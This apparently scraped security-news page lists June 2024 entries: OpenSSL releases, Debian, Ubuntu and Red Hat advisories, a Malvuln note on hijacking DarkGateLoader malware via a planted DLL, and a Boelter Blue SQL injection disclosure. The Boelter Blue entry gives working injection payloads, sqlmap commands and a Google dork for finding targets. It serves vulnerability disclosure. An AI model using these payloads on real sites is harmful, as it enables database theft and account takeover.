OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

OpenSSL Toolkit 3.3.1

OpenSSL Toolkit 3.2.2

OpenSSL Toolkit 3.1.6

Boelter Blue System Management version 1.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)Google Dork: inurl:"Powered by Boelter Blue"Date: 2024-06-04Exploit Author: CBKB (DeadlyData, R4d1x)Vendor Homepage: https://www.boelterblue.comSoftware Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_USVersion: 1.3Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12CVE: CVE-2024-36840Vulnerability Details:Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.PoC:web server operating system: Linux Debian 9 (stretch)web application technology: Apache 2.4.25back-end DBMS: MySQL >= 5.0.12[22:21:39] [INFO] fetching database namesavailable databases [5]:[*] Anchor5Digital1. news_details.php?id parameter:Type: Boolean-based blindPayload: id=10071 AND 4036=4036Type: Time-based blindPayload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs2. services.php?section parameter:Type: Boolean-based blindPayload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))Type: Time-based blindPayload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs3. location_details.php?id parameter:Type: Boolean-based blindPayload: id=836 AND 4036=4036Type: Time-based blindPayload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbsImpact:Unauthorized access to the database.Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.Account takeovers and potential full control of the affected application.Discoverer(s)/Credits:CBKB (DeadlyData, R4d1x)References:https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

Boelter Blue System Management 1.3 SQL Injection

OpenSSL Toolkit 3.0.14

Debian Linux Security Advisory 5705-1 - A use-after-free was discovered in tinyproxy, a lightweight, non-caching, optionally anonymizing HTTP proxy, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5705-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 05, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : tinyproxyCVE ID         : CVE-2023-49606A use-after-free was discovered in tinyproxy, a lightweight, non-caching,optionally anonymizing HTTP proxy, which could result in denial ofservice.For the stable distribution (bookworm), this problem has been fixed inversion 1.11.1-2.1+deb12u1.We recommend that you upgrade your tinyproxy packages.For the detailed security status of tinyproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tinyproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZgtJsACgkQEMKTtsN8TjayjxAAv/O9LSl0hdPmdVluYepX1yso5nf8Qb42rSVNPfLegsy1gr/Q1NVPJjuy471IezOPl6u/g8mg+3UquD6sRs5Q9vFc6seFWybo3TenVNNA2SMClwRAjJeuCWVWlEfAIpw0VTMpVh7cWqFuBBCOLJ0CMLXab/cXGib65L+jCxnmjTkvm3rXAfDxDec6mF0UG0vQydGS7dBfMN86udhX3KMXQPY1lctG+6r0lhBnLC79+uJPHmfC6Qup18MSbe80nB5pCc4kCk2+mbdGZ4UxnFW5sjKI40i9WAmw+7QRzunA6dgvqX6K9NINh3vrol9yWcGMNVhdaw2OY1q37tlqc2DZmv6dUD3uQJ8QN7JKVjep+uukgzk99sLkgm6WGxq815bQ1ExdFybxz+x4ixwJN5CoHlD9SjUONunPSq95wqYvkpMcmqDI2DMu3yRBOm7mOf9wePUnAFoqkQv3hUXX5VNfjnVPSYTh0ewNsj1mUv69flJBt9pmAQSuB24n5SnnK4sRIQcVo/extDxtmLSNYqrKcM8FRD0mCGBv1CqyLHnYo9fLHdGzscO3GwzFFYBoH3Z6mVBpIICctWml0Sn5H1jr7/pu9pDmfmTGlJdyteW/XJLLtwLgu23CsFGWdcwTQPn8Uw21+qoFgullC94vsyvLjvn9yzTG59A0A6f5U9wODF0==euKq-----END PGP SIGNATURE-----

Debian Security Advisory 5705-1

Multiple variants of Trojan.Win32.DarkGateLoader malware suffer from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/afe012ed0d96abfe869b9e26ea375824.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Trojan.Win32.DarkGateLoader (multi variants)Vulnerability: Arbitrary Code ExecutionDescription: Multiple variants of this malware look for and execute x32-bit "urlmon.dll" PE file in its current directory. Therefore, we can hijack that DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3.1 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: DarkGateLoaderType: PE32MD5: afe012ed0d96abfe869b9e26ea375824SHA256: 18d87c514ff25f817eac613c5f2ad39b21b6e04b6da6dbe8291f04549da2c290Other vulnerable samples: cad102af0d2709fd57f62d9cce9ba174ca2ef9d31463414286572958928941703c609ac6b2de29578a2383d71e12caa9Vuln ID: MVID-2024-0685Disclosure: 06/05/2024Exploit/PoC:1) Download RansomLord v3.1    https://github.com/malvuln/RansomLord2) Locate the x32 urlmon.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x32 DLL urlmon.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will attempt to log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32.DarkGateLoader MVID-2024-0685 Code Execution

Ubuntu Security Notice 6567-2 - USN-6567-1 fixed vulnerabilities QEMU. The fix for CVE-2023-2861 was too restrictive and introduced a behavior change leading to a regression in certain environments. This update fixes the problem. Gaoning Pan and Xingwei Li discovered that QEMU incorrectly handled the USB xHCI controller device. A privileged guest attacker could possibly use this issue to cause QEMU to crash, leading to a denial of service. Various other issues were also addressed.

    ==========================================================================Ubuntu Security Notice USN-6567-2June 06, 2024qemu regression==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:USN-6567-1 introduced a regression in QEMU.Software Description:- qemu: Machine emulator and virtualizerDetails:USN-6567-1 fixed vulnerabilities QEMU. The fix for CVE-2023-2861 was toorestrictive and introduced a behaviour change leading to a regression incertain environments. This update fixes the problem.Original advisory details:  Gaoning Pan and Xingwei Li discovered that QEMU incorrectly handled the  USB xHCI controller device. A privileged guest attacker could possibly use  this issue to cause QEMU to crash, leading to a denial of service. This  issue only affected Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. (CVE-2020-14394)   It was discovered that QEMU incorrectly handled the TCG Accelerator. A  local attacker could use this issue to cause QEMU to crash, leading to a  denial of service, or possibly execute arbitrary code and esclate  privileges. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-24165)   It was discovered that QEMU incorrectly handled the Intel HD audio device.  A malicious guest attacker could use this issue to cause QEMU to crash,  leading to a denial of service. This issue only affected Ubuntu 22.04 LTS.  (CVE-2021-3611)   It was discovered that QEMU incorrectly handled the ATI VGA device. A  malicious guest attacker could use this issue to cause QEMU to crash,  leading to a denial of service. This issue only affected Ubuntu 20.04 LTS.  (CVE-2021-3638)   It was discovered that QEMU incorrectly handled the VMWare paravirtual RDMA  device. A malicious guest attacker could use this issue to cause QEMU to  crash, leading to a denial of service. (CVE-2023-1544)   It was discovered that QEMU incorrectly handled the 9p passthrough  filesystem. A malicious guest attacker could possibly use this issue to  open special files and escape the exported 9p tree. This issue only  affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04.  (CVE-2023-2861)   It was discovered that QEMU incorrectly handled the virtual crypto device.  A malicious guest attacker could use this issue to cause QEMU to crash,  leading to a denial of service, or possibly execute arbitrary code. This  issue only affected Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04.  (CVE-2023-3180)   It was discovered that QEMU incorrectly handled the built-in VNC server.  A remote authenticated attacker could possibly use this issue to cause QEMU  to stop responding, resulting in a denial of service. This issue only  affected Ubuntu 22.04 LTS and Ubuntu 23.04. (CVE-2023-3255)   It was discovered that QEMU incorrectly handled net device hot-unplugging.  A malicious guest attacker could use this issue to cause QEMU to crash,  leading to a denial of service. This issue only affected Ubuntu 22.04 LTS  and Ubuntu 23.04. (CVE-2023-3301)   It was discovered that QEMU incorrectly handled the built-in VNC server.  A remote attacker could possibly use this issue to cause QEMU to crash,  resulting in a denial of service. This issue only affected Ubuntu 20.04  LTS, Ubuntu 22.04 LTS, and Ubuntu 23.04. (CVE-2023-3354)   It was discovered that QEMU incorrectly handled NVME devices. A malicious  guest attacker could use this issue to cause QEMU to crash, leading to a  denial of service. This issue only affected Ubuntu 23.10. (CVE-2023-40360)   It was discovered that QEMU incorrectly handled NVME devices. A malicious  guest attacker could use this issue to cause QEMU to crash, leading to a  denial of service, or possibly obtain sensitive information. This issue  only affected Ubuntu 23.10. (CVE-2023-4135)   It was discovered that QEMU incorrectly handled SCSI devices. A malicious  guest attacker could use this issue to cause QEMU to crash, leading to a  denial of service. This issue only affected Ubuntu 23.04 and Ubuntu 23.10.  (CVE-2023-42467)   It was discovered that QEMU incorrectly handled certain disk offsets. A  malicious guest attacker could possibly use this issue to gain control of  the host in certain nested virtualization scenarios. (CVE-2023-5088)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS   qemu-system                     1:6.2+dfsg-2ubuntu6.21   qemu-system-arm                 1:6.2+dfsg-2ubuntu6.21   qemu-system-mips                1:6.2+dfsg-2ubuntu6.21   qemu-system-misc                1:6.2+dfsg-2ubuntu6.21   qemu-system-ppc                 1:6.2+dfsg-2ubuntu6.21   qemu-system-s390x               1:6.2+dfsg-2ubuntu6.21   qemu-system-sparc               1:6.2+dfsg-2ubuntu6.21   qemu-system-x86                 1:6.2+dfsg-2ubuntu6.21   qemu-system-x86-microvm         1:6.2+dfsg-2ubuntu6.21   qemu-system-x86-xen             1:6.2+dfsg-2ubuntu6.21Ubuntu 20.04 LTS   qemu-system                     1:4.2-3ubuntu6.29   qemu-system-arm                 1:4.2-3ubuntu6.29   qemu-system-mips                1:4.2-3ubuntu6.29   qemu-system-misc                1:4.2-3ubuntu6.29   qemu-system-ppc                 1:4.2-3ubuntu6.29   qemu-system-s390x               1:4.2-3ubuntu6.29   qemu-system-sparc               1:4.2-3ubuntu6.29   qemu-system-x86                 1:4.2-3ubuntu6.29   qemu-system-x86-microvm         1:4.2-3ubuntu6.29   qemu-system-x86-xen             1:4.2-3ubuntu6.29After a standard system update you need to restart all QEMU virtualmachines to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6567-2   https://ubuntu.com/security/notices/USN-6567-1   https://launchpad.net/bugs/2065579Package Information:   https://launchpad.net/ubuntu/+source/qemu/1:6.2+dfsg-2ubuntu6.21   https://launchpad.net/ubuntu/+source/qemu/1:4.2-3ubuntu6.29

Ubuntu Security Notice USN-6567-2

Red Hat Security Advisory 2024-3701-03 - An update for nghttp2 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3701.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nghttp2 security updateAdvisory ID:        RHSA-2024:3701-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3701Issue date:         2024-06-06Revision:           03CVE Names:          CVE-2024-28182====================================================================Summary: An update for nghttp2 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libnghttp2 is a library implementing the Hypertext Transfer Protocol version 2 (HTTP/2) protocol in C.Security Fix(es):* nghttp2: CONTINUATION frames DoS (CVE-2024-28182,VU#421644.5)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-28182References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268639

Red Hat Security Advisory 2024-3701-03

Red Hat Security Advisory 2024-3685-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3685.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: java-1.8.0-ibm security updateAdvisory ID:        RHSA-2024:3685-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3685Issue date:         2024-06-06Revision:           03CVE Names:          CVE-2023-38264====================================================================Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):* IBM JDK: Object Request Broker (ORB) denial of service (CVE-2023-38264)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-38264References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2279963